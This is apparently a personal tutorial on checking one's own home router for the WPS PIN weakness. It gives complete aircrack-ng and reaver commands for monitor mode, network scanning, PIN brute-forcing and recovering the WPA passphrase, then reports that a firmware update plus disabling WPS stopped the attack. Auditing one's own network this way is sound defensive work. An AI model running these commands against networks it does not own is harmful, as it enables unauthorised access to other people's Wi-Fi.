In order to test this, you must have a WiFi card with monitor mode. The Penguin Wireless N USB Adapter for GNU / Linux (TPE-N150USB) worked well for me.

TPE-N150USB

ThinkPenguin USB WiFi cards typically use Atheros chipsets, and because ThinkPenguin uses predictable chipsets you can be certain you will receive an Atheros chipset for this device. With this card, you can use monitor mode. The range not be great, but if you are testing the security of your own home network, range should not matter much.

Install the necessary tools.

sudo apt-get install \
	aircrack-ng \
	reaver

Disable your WiFi interface.

sudo ifconfig wlan0 down

Enable monitor mode for your WiFi interface.

sudo airmon-ng start wlan0

Note the name of the monitoring device output from the command above. In my case, it is wlan0mon.

Kill processes that may conflict with airmon tools.

sudo airmon-ng check kill

Scan for a network. PWR indicates signal strength. A number like -20 is superior to a number like -74. The greater number is superior, and -20 is greater than -74.

sudo airodump-ng wlan0mon

Try to test for the WPS vulnerability against the AP using reaver, which is specifically designed for this exploit. Specify your device’s channel with -c and the BSSID (mac of the router) with -b.

sudo reaver \
	-i wlan0mon \
	-b 22:46:BA:34:CB:18 \
	-vv \
	-L \
	-N \
	-d 30 \
	-T 1

If your access point is vulnerable, the WPS pin will eventually be discovered.

[+] Pin cracked in 273832 seconds
[+] WPS PIN: '29701453'
[+] WPA PSK: 'thepassword123'
[+] AP SSID: 'MyAccessPoint'

Success!

If reaver only shows you the PIN and not the PSK, you can find it like so.

sudo reaver \
	-i wlan0mon \
	-p 29701453 \
	-b 22:46:BA:34:CB:18 \
	-vv

My router was compromised in 273832 seconds, which is just over 3 days.

My Netgear WNR2000v3 was then updated to the latest firmware as listed here.

Current Firmware Version:     V1.0.1.26
New Firmware Version:         V1.1.2.18

Current GUI Language Version: V1.0.0.55
New GUI Language Version:     V1.0.0.175

This upgrade automatically enables a 3 second lockout for failed WPS attempts.

Unfortunately, reaver did not seem to care, and went to work hacking the PIN just as it did before. It was not affected by that lockout setting.

I then disabled WPS entirely in the admin interface. As many articles mention, some routers don’t actually disable WPS even if the interface implies it is disabled.

In cases like that, it seems the only reliable preventative measure is to either get a router that actually disables WPS, or install DD-WRT, OpenWRT, or LEDE on your router.

Fortunately, this firmware upgrade along with disabling WPS actually worked in my case, and reaver was unable to determine my PIN.

Citations